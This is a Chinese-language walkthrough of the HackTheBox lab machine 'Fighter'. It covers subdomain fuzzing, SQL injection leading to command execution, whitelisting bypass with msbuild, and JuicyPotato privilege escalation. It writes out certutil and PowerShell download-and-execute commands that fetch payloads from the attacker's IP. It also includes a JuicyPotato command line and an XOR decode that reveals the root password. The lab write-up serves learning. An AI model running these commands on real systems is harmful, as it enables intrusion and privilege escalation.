Skip to content

Latest commit

 

History

History
371 lines (192 loc) · 18 KB

HackTheBox-windows-Fighter.md

File metadata and controls

371 lines (192 loc) · 18 KB
Raw

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

大余安全  

一个每日分享渗透小技巧的公众号

大家好,这里是 大余安全 的第 74 篇文章,本公众号会每日分享攻防渗透技术给大家。

靶机地址:https://www.hackthebox.eu/home/machines/profile/137

靶机难度:高级(无 / 10)

靶机发布日期:2018 年 10 月 25 日

靶机描述:

Rabbit is a fairly realistic machine which provides excellent practice for client-side attacks and web app enumeration. The large potential attack surface of the machine and lack of feedback for created payloads increases the difficulty of the machine.

请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用 Kali Linux 作为解决该 HTB 的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

可以看到靶机的 IP 是 10.10.10.72....

Nmap 发现 80 端口开放着,版本 IIS/8.5,可以知道 Windows Server 2012 R2 上运行(可以 goole 搜索即可知道)

这是拳皇...

这里找到了域名...streetfighterclub.htb,还让我们去找到下一个链接... 先添加到 hosts 中

利用 gobuster 和 dirb 爆破域名... 没发现任何信息...

wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u streetfighterclub.htb -H "Host: FUZZ.streetfighterclub.htb" --hw 717

这里利用 wfuzz 进行域名爆破,发现了底下有 members 子域名,一般信息收集真实域名如果发现不了,去尝试发现子域名,会有意外收获...

这里把 members.streetfighterclub.htb 加入到 hots 中即可... 继续爆破...

gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://members.streetfighterclub.htb -o dayu.log

可以看到子域名爆破发现了有用的目录...old

这里前面知道运行的是 IIS,存在 asp 文件,继续针对进行爆破...

gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://members.streetfighterclub.htb/old -X .asp

可以看到发现了 login.asp...

可以看到这是一个登陆界面... 测试了默认密码都无法登陆,这边进行 sql 注入分析...

这里利用 burpsuit 进行分析...

经过初步分析,两个 type 中 administrator 和 User 的类型都是一致的,都是 2017 字节... 这里我就随意用一个分析即可...

这里已经测试过了 admin 和 passwd 的注入,都无法注入... 这里尝试在 type 发现了 500 的错误... 这里有错误肯定有正确,找到反对注入点即可

可以看到存在注入点,符号加英文是返回 302,英文加任何都是 500 回复... 利用 sql 注入方法开始注入...

仔细可以看到,SQL 注入回复了一封 email....

找到了个电子邮件...

这里知道注入点可以找到对方的内容信息... 那只要提交个 shell 即可提权???

这里经过了大神的文章...

[参考链接](https://www.tarlogic.com/en/blog/red-team-tales-0x01/)

利用 sql 获得 REC...

这里命令需要的私聊我,弄了几个小时... 收获非常多... 注入

可以看到成功获得低权用户... 反向外壳...

打了挺多补丁的...159 个...(牛逼)

在此用户上,不能查看 user 信息...

可以看到防火墙已经开放了 80 端口...

尝试用了 MSF 的 EXE 提权,和 shell 提权都没办法,防火墙阻碍了...

这边需要绕过防火墙,或者加入白名单等方式,进行提权了...

方法 1:

GreatSCT 利用这个工具进行防病毒... 这里需要下载 steup(在文件中带了,./setup -c 即可下载相关组件)

./GreatSCT.py

运行后,开始利用工具,里面很多 exploit 都是可以绕过各种防火墙的 shell... 这里生成即可...use Bypass 选择绕过的意思...

这里不懂得可以看我前面截图得 help...

list 选择 payload...GO

可以看到,这里选择 https 得 payload...(q 返回上一层)

选择刚利用得 payload 即可...

这里填写反向 shell 回来指向本地 IP 即可... 然后 generate 执行产生有效载荷...

执行完 generate 后,直接输入 dayushell 即可..(名称)

然后会生成 shellcode... 这里直接利用 dayushell.xml 即可...

certutil.exe -urlcache -split -f http://10.10.14.11/dayushell.xml dayushell.xml

本地开启 80 服务上传文件,成功利用 windows 上带得 certutil 上传了 shellcode...

这里利用 MSF 来进行监听... 选择 https.. 端口选择和 shellcode 一致即可...

这里要利用 windows 自带得 msbuild.exe 进行白名单方式绕过执行. xml 得 shellcode 文件...

msbuild.exe 存放的路径搜索都能知道...

开始提权...GO

可以看到,是可以提权的,但是利用 MSF 也无法获取反向 shell 的数据包...

不知道是 exploit 错了,还是 GreatSCT 有生成的包有问题... 这里按照思路尝试了挺久,没成功,应该是 exp 有问题... 大家看到这里的可以尝试下...

方法 2:

https://github.com/ohpe/juicy-potato

利用土豆进行绕过防火墙提权...

下载到本地...

上传即可...

随意拿一个文件执行,可以看到需要得条件挺多,条件允许得情况才可提权... 开始把

这里需要一个 shell... 利用 nishang 即可...

cmd /c "echo powershell iex(new-object net.webclient).downloadstring(''http://10.10.14.11/dayu'') >shell.bat"

写一个 Bat... 利用 powershell 上传 shellcode.... 现在只差 CLSID 了...

到这里找即可....

前面 Nmap 和低权 systeminfo 都可以看出系统信息... 选择 2012 即可...

可以看到随意利用 CLSID 不对... 这里一个一个试即可... 版本所有得 CLSID 都在里面... 不多

C:\windows\system32\spool\drivers\color\JuicyPotato.exe -p shell.bat -t * -l 1337 -c '{8F5DF053-3013-4dd8-B5F4-88214E81C0CF}'

这里出了点问题,前面 CLSID 成功了,但是 80 却没上传 dayu 得 shellcode... 检查发现多打了两个点.... 看图即可...

可以看到成功提权... 这里通过 CLSID 方式绕过了防火墙防病毒模块...

三、逆向工程

user 可以正常读取... 这里查看 root 信息还有个小坑...root

可以看到还存在着一个 checkdll.dll 文件... 可以利用它解析 root.exe 成 txt 文件,然后下载即可...

可以看到执行 root.exe 需要 passwd... 这里开始解析,下载下来...

这里要逆向去分析 root.exe 了...GO

这边需要使用到 IDA 进行... 装了半天还是没装上,有人 kali 装了 IDA 的教我下... 但是我装在了电脑上.. 在 windows10 进行分析一样...

这里记得 checkdll.dll 也要下载,这两个是连带的... 不然无法逆向...

可以看到成功打开了,这已经不是我第一次玩逆向了... 开始

可以看到 root.exe 是基于 checkdll.dll 执行的,如果想分析打开 root.exe 只要去逆向解析 checkdll 即可...

这里 shift+F12 可以弹出 string window 可以查看详细的插件汇编内容...

这里需要知道程序对变量 aFmFeholH 的字符是多少,点击 check+8 跳转到 Fm`fEhOl}h 去查看下...

这里可以看到 Fm`fEhOl}h 该函数对于 aFmFeholH 的 xor 每个字符是 9...

这里就好办了,直接写个简单 python 跑下即可...

for i in "Fm`fEhOl}h":
    print(chr(ord(i) ^ ord('\x09')),end='')


print()

简单的命令跑下即可... 得到了密码 OdioLaFeta...

可以看到成功获得 root 信息....

从开始的信息收集域名爆破,到 burpsuit 分析 sql 注入点,到绕过防火墙提权,到利用 IDA 逆向解析. exe 程序...

学到挺多,做的过程很头疼,做完的感觉思路很清晰... 加油!!!

这里应该还有很多绕开 WAF、防火墙、防病毒模块等大神写的工具,或者方法,慢慢总结!

kali 还是没装成 IDA... 估计是环境问题...

GreatSCT 提权还是有问题...

希望会以上这两个的,私聊告知,感谢!

由于我们已经成功得到 root 权限查看 user.txt 和 root.txt,因此完成了较困难靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~

随缘收徒中~~ 随缘收徒中~~ 随缘收徒中~~

欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!

大余安全

一个全栈渗透小技巧的公众号